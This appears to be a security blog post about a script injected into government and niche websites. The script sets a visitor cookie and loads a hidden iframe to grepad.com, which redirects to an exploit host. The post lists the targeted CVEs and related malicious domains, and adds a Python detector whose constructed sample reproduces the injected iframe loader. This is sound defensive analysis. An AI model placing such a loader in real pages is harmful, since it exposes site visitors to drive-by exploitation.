Grepad.com Iframe Nets Gov't, Niche Sites
ScanSafe traffic analysis reveals that a number of government and popular niche websites have had a malicious script injected after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com, which attempts to exploit a series of vulnerabilities. Observed exploits include:
- Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992)
- Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927)
- Office OCX OpenWebFile (BID-33243)
- Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388)
- Hummingbird PerformUpdateAsync (CVE-2008-4728)
- Peachtree ExecutePreferredApplication (CVE-2008-4699)
- C6 Messenger propDownloadUrl (CVE-2008-2551)
- Internet Explorer memory corruption (MS09-002)
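The injection pattern described above (script appended after the closing html tag, a cookie written to mark the visitor, then an iframe to the redirector) is easy to check for in captured page bodies. The following is an added example, not ScanSafe's detection logic: it isolates everything after the last closing html tag, counts script blocks there, flags cookie writes and extracts iframe hosts, and matches them against a watchlist. The sample page is constructed for this example; the cookie name, the iframe URL path and the inline-script form are assumptions, not details from the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample (not a real capture): a benign page followed by an
# injected script after </html>, in the pattern the post describes.
SAMPLE_PAGE = """<html><head><title>Agency Home</title></head>
<body><p>Welcome.</p></body></html>
<script>
if (document.cookie.indexOf("visited=") == -1) {
  document.cookie = "visited=1; expires=Thu, 01 Jan 2099 00:00:00 GMT; path=/";
  document.write('<iframe src="http://grepad.com/" width="1" height="1"></iframe>');
}
</script>
"""

# Domains from the post; anything resolving to them in an injected iframe is a hit.
WATCHLIST = {"grepad.com", "ginopost.com"}

CLOSE_HTML_RE = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
# Matches iframe markup whether it is literal HTML or inside a document.write() string.
IFRAME_SRC_RE = re.compile(r"""<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# An assignment to document.cookie (a read such as document.cookie.indexOf does not match).
COOKIE_WRITE_RE = re.compile(r"document\.cookie\s*=", re.IGNORECASE)


def trailing_content(html):
    """Return everything after the last closing html tag, or '' if nothing follows it."""
    closes = list(CLOSE_HTML_RE.finditer(html))
    if not closes:
        return ""
    return html[closes[-1].end():]


def analyze_page(html, watchlist=WATCHLIST):
    """Summarise script content injected after the closing html tag.

    Returns a dict with the number of trailing script blocks, whether any of them
    writes a cookie, the hosts of any iframes they emit, and which of those hosts
    are on the watchlist.
    """
    tail = trailing_content(html)
    findings = {
        "injected_scripts": 0,
        "sets_cookie": False,
        "iframe_hosts": [],
        "watchlist_hits": [],
    }
    for block in SCRIPT_RE.finditer(tail):
        findings["injected_scripts"] += 1
        body = block.group(1)
        if COOKIE_WRITE_RE.search(body):
            findings["sets_cookie"] = True
        for src in IFRAME_SRC_RE.findall(body):
            host = urlparse(src).hostname
            if host:
                findings["iframe_hosts"].append(host.lower())
    findings["watchlist_hits"] = [h for h in findings["iframe_hosts"] if h in watchlist]
    return findings


if __name__ == "__main__":
    result = analyze_page(SAMPLE_PAGE)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Content after the closing html tag is not malicious by itself (some CMS plugins and analytics snippets land there too), so the script count alone is only a lead; the cookie write plus an iframe to a watchlisted host is what turns it into a finding worth acting on. Running this over stored HTTP bodies from a proxy log, rather than fetching pages live, avoids tripping the repeat-visitor cookie check that hides the iframe from second requests.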
The malware host, ginopost.com, was registered on April 25th and is hosted on the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on Network Solutions hosted WordPress blogs. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net.
Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate, ongoing series of attacks has also targeted WordPress-published sites hosted by GoDaddy.

Mary Landesman